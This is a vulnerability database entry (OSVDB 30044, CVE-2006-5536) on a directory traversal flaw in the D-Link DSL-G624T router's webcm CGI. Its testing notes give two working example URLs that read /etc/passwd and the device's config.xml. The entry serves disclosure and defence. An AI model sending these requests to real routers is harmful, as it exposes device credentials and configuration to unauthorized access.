D-Link DSL-G624T cgi-bin/webcm getpage Variable Traversal Arbitrary File Access

2006-10-23T10:48:48
ID OSVDB:30044
Type osvdb
Reporter OSVDB
Modified 2006-10-23T10:48:48

Description

Manual Testing Notes

http://[target]/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://[target]/cgi-bin/webcm?getpage=/./././././././etc/config.xml

References:

Secunia Advisory ID: 22524
Related OSVDB ID: 30045
Other Advisory URL: http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0056.html
CVE-2006-5536